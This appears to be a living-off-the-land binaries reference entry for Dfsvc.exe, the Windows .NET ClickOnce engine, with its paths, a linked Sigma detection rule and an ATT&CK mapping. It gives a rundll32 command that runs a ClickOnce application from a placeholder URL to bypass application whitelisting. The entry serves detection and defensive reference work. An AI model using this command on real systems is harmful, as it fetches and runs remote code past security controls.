.. /Dfsvc.exe
Star

ClickOnce engine in Windows used by .NET

Paths:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe

Resources:

Acknowledgements:

Casey Smith (@subtee)

Detection:

Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml

AWL bypass

Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
```
rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
```
Use case
Use binary to bypass Application whitelisting

Privileges required
User

Operating systems
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

ATT&CK® technique
T1127